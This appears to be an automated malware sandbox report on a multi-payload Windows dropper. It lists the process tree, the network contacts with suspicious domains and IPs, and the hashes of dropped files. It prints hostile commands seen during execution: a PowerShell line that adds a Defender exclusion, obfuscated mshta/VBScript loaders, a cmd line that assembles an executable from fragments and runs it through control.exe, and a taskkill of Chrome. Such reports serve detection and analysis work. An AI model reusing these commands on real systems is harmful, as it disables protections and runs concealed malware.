PID 1652 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1652 wrote to memory of 472 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe

"C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue072fdbb8e4b2f5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07ef9e317e0f6ae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07a633a94f9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07b3bf87d8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07caa83bac5d15.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07267c17f2f5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07e35cf558.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue070aab9bc86b572.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07816149b72db00.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue071e59dc8292b4ef1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue0750373995e75.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue0741bc096fd881d2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue078a285ef7.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue07006d6b7c.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue072fdbb8e4b2f5.exe

Tue072fdbb8e4b2f5.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07a633a94f9.exe

Tue07a633a94f9.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe

Tue0750373995e75.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07816149b72db00.exe

Tue07816149b72db00.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1652 -s 476

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe

Tue070aab9bc86b572.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue078a285ef7.exe

Tue078a285ef7.exe /mixone

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe

Tue07006d6b7c.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe

Tue07267c17f2f5.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07caa83bac5d15.exe

Tue07caa83bac5d15.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe

Tue071e59dc8292b4ef1.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07e35cf558.exe

Tue07e35cf558.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe

Tue0741bc096fd881d2.exe

C:\Users\Admin\AppData\Local\Temp\is-DUP9L.tmp\Tue07e35cf558.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DUP9L.tmp\Tue07e35cf558.tmp" /SL5="$C0150,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07e35cf558.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "" == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe" ) do taskkill -F -Im "%~nXU"

C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe

SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK

C:\Windows\SysWOW64\taskkill.exe

taskkill -F -Im "Tue07267c17f2f5.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBsCRipT: CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn ("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"

C:\Windows\SysWOW64\control.exe

control .\FUEj5.QM

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1084 -s 336

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\SetupMX_1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\SetupMX_1.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\zaebalidelete2_2.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\zaebalidelete2_2.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\BKqUCEa.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\BKqUCEa.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\wam.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\wam.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe"

C:\Users\Admin\Pictures\Adobe Films\Fenix_2.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Fenix_2.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\zxc_team_1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\zxc_team_1.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\manager_like_1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\manager_like_1.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\blb0l.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\blb0l.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe

"C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe"

C:\Users\Admin\Pictures\Adobe Films\bezo.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\bezo.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\0.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\0.bmp.exe"

C:\Users\Admin\Pictures\Adobe Films\Hfcdvjjdsxvb_crypted_1.bmp.exe

"C:\Users\Admin\Pictures\Adobe Films\Hfcdvjjdsxvb_crypted_1.bmp.exe"

Network

Country Destination Domain Proto
N/A 127.0.0.1:49239 tcp
N/A 127.0.0.1:49241 tcp
US 8.8.8.8:53 hsiens.xyz udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.133.1.182:80 tcp
US 8.8.8.8:53 gcl-page.biz udp
US 8.8.8.8:53 www.listincode.com udp
AU 103.224.212.220:443 www.listincode.com tcp
US 8.8.8.8:53 mas.to udp
US 8.8.8.8:53 safialinks.com udp
DE 88.99.75.82:443 mas.to tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 104.110.191.201:80 apps.identrust.com tcp
NL 104.110.191.201:80 apps.identrust.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 best-link-app.com udp
US 8.8.8.8:53 auto-repair-solutions.bar udp
US 8.8.8.8:53 onepremiumstore.bar udp
US 8.8.8.8:53 premium-s0ftwar3875.bar udp
BE 35.205.61.67:443 premium-s0ftwar3875.bar tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
UA 194.145.227.161:80 tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
NL 212.193.30.115:80 212.193.30.115 tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 ipinfo.io udp
FR 91.121.67.60:62102 tcp
US 34.117.59.81:443 ipinfo.io tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
NL 212.193.30.115:80 212.193.30.115 tcp
US 8.8.8.8:53 guidereviews.bar udp
US 8.8.8.8:53 www.iyiqian.com udp
BE 35.205.61.67:443 premium-s0ftwar3875.bar tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
UA 194.145.227.161:80 tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
NL 212.193.30.115:80 212.193.30.115 tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 xzaaen.click udp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 172.67.195.158:80 xzaaen.click tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 172.67.195.158:80 xzaaen.click tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 172.67.195.158:80 xzaaen.click tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 172.67.195.158:80 xzaaen.click tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 172.67.195.158:443 xzaaen.click tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 v2.trustnero.com udp
US 172.67.128.245:80 v2.trustnero.com tcp
US 172.67.128.245:80 v2.trustnero.com tcp
US 172.67.128.245:80 v2.trustnero.com tcp
US 172.67.128.245:80 v2.trustnero.com tcp
US 172.67.128.245:443 v2.trustnero.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 107.182.129.251:80 107.182.129.251 tcp
RU 62.204.41.178:80 62.204.41.178 tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
FR 91.121.67.60:62102 tcp
UA 194.145.227.161:80 tcp
FR 91.121.67.60:62102 tcp

Files

memory/1700-54-0x0000000075251000-0x0000000075253000-memory.dmp

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 caf8ca550d3f3d81c5f365fe52b6a968
SHA1 58ffab07a16ab43a29f6c6c7350ad9465e38d7a6
SHA256 1cc768cdba83c2d01b3ddf5a9e1e0c5f27d0e9c46f667bc1625f6897a4509808
SHA512 d21bf6ca63883297963d5ed6599517d9628b3f0bdd7208a48e0b577c20027756b1dbcc99b0194cdd71e60f8d412d3ade703238a36aec9bd8a63b1e45980085b0

memory/984-56-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 caf8ca550d3f3d81c5f365fe52b6a968
SHA1 58ffab07a16ab43a29f6c6c7350ad9465e38d7a6
SHA256 1cc768cdba83c2d01b3ddf5a9e1e0c5f27d0e9c46f667bc1625f6897a4509808
SHA512 d21bf6ca63883297963d5ed6599517d9628b3f0bdd7208a48e0b577c20027756b1dbcc99b0194cdd71e60f8d412d3ade703238a36aec9bd8a63b1e45980085b0

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 caf8ca550d3f3d81c5f365fe52b6a968
SHA1 58ffab07a16ab43a29f6c6c7350ad9465e38d7a6
SHA256 1cc768cdba83c2d01b3ddf5a9e1e0c5f27d0e9c46f667bc1625f6897a4509808
SHA512 d21bf6ca63883297963d5ed6599517d9628b3f0bdd7208a48e0b577c20027756b1dbcc99b0194cdd71e60f8d412d3ade703238a36aec9bd8a63b1e45980085b0

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 caf8ca550d3f3d81c5f365fe52b6a968
SHA1 58ffab07a16ab43a29f6c6c7350ad9465e38d7a6
SHA256 1cc768cdba83c2d01b3ddf5a9e1e0c5f27d0e9c46f667bc1625f6897a4509808
SHA512 d21bf6ca63883297963d5ed6599517d9628b3f0bdd7208a48e0b577c20027756b1dbcc99b0194cdd71e60f8d412d3ade703238a36aec9bd8a63b1e45980085b0

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 caf8ca550d3f3d81c5f365fe52b6a968
SHA1 58ffab07a16ab43a29f6c6c7350ad9465e38d7a6
SHA256 1cc768cdba83c2d01b3ddf5a9e1e0c5f27d0e9c46f667bc1625f6897a4509808
SHA512 d21bf6ca63883297963d5ed6599517d9628b3f0bdd7208a48e0b577c20027756b1dbcc99b0194cdd71e60f8d412d3ade703238a36aec9bd8a63b1e45980085b0

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 caf8ca550d3f3d81c5f365fe52b6a968
SHA1 58ffab07a16ab43a29f6c6c7350ad9465e38d7a6
SHA256 1cc768cdba83c2d01b3ddf5a9e1e0c5f27d0e9c46f667bc1625f6897a4509808
SHA512 d21bf6ca63883297963d5ed6599517d9628b3f0bdd7208a48e0b577c20027756b1dbcc99b0194cdd71e60f8d412d3ade703238a36aec9bd8a63b1e45980085b0

\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe

MD5 fd028a8767b18e446c4c20c95bc1cd13
SHA1 9b3c725a720fc615cf9db72cf2449c558b4e87d3
SHA256 b7d92a51ae6861c7e3853b031acefb078268dfb5cab0b340017691d5f3ef2f05
SHA512 c1fb52eb12c26c9367cfd8c48fdc6c4310af5e58a873165ec9a4121ee999f84bef6a5602f01d3439881f45736cc2990ca76339cd5d76afa25a276c31a667bacb

\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe

MD5 fd028a8767b18e446c4c20c95bc1cd13
SHA1 9b3c725a720fc615cf9db72cf2449c558b4e87d3
SHA256 b7d92a51ae6861c7e3853b031acefb078268dfb5cab0b340017691d5f3ef2f05
SHA512 c1fb52eb12c26c9367cfd8c48fdc6c4310af5e58a873165ec9a4121ee999f84bef6a5602f01d3439881f45736cc2990ca76339cd5d76afa25a276c31a667bacb

\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe

MD5 fd028a8767b18e446c4c20c95bc1cd13
SHA1 9b3c725a720fc615cf9db72cf2449c558b4e87d3
SHA256 b7d92a51ae6861c7e3853b031acefb078268dfb5cab0b340017691d5f3ef2f05
SHA512 c1fb52eb12c26c9367cfd8c48fdc6c4310af5e58a873165ec9a4121ee999f84bef6a5602f01d3439881f45736cc2990ca76339cd5d76afa25a276c31a667bacb

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe

MD5 fd028a8767b18e446c4c20c95bc1cd13
SHA1 9b3c725a720fc615cf9db72cf2449c558b4e87d3
SHA256 b7d92a51ae6861c7e3853b031acefb078268dfb5cab0b340017691d5f3ef2f05
SHA512 c1fb52eb12c26c9367cfd8c48fdc6c4310af5e58a873165ec9a4121ee999f84bef6a5602f01d3439881f45736cc2990ca76339cd5d76afa25a276c31a667bacb

memory/1652-66-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

\Users\Admin\AppData\Local\Temp\7zS8D31384C\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS8D31384C\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zS8D31384C\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

\Users\Admin\AppData\Local\Temp\7zS8D31384C\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
